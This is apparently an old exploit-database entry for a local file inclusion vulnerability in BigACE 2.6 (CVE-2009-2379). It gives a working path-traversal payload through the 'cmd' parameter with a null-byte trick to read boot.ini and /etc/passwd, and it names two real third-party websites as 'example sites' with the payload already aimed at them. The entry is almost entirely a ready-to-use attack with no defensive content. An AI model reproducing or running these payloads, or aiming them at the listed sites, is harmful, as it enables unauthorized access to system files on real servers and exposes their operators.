BigACE 2.6 - 'cmd' Local File Inclusion



EKU-ID: 16840 CVE: OSVDB-55510;CVE-2009-2379 OSVDB-ID:
Author: CWD@rBe Published: 2009-06-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


-----------------:LFI:----------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------------
script       : BIGACE 2.6

download  : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip

Author     : CWD@rBe

Special Thanks : www.cyber-warrior.org

***************************************************************************************************************
exploit:

http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len

example sites

1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len

2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len

****************************************************************************************************************

# milw0rm.com [2009-06-30]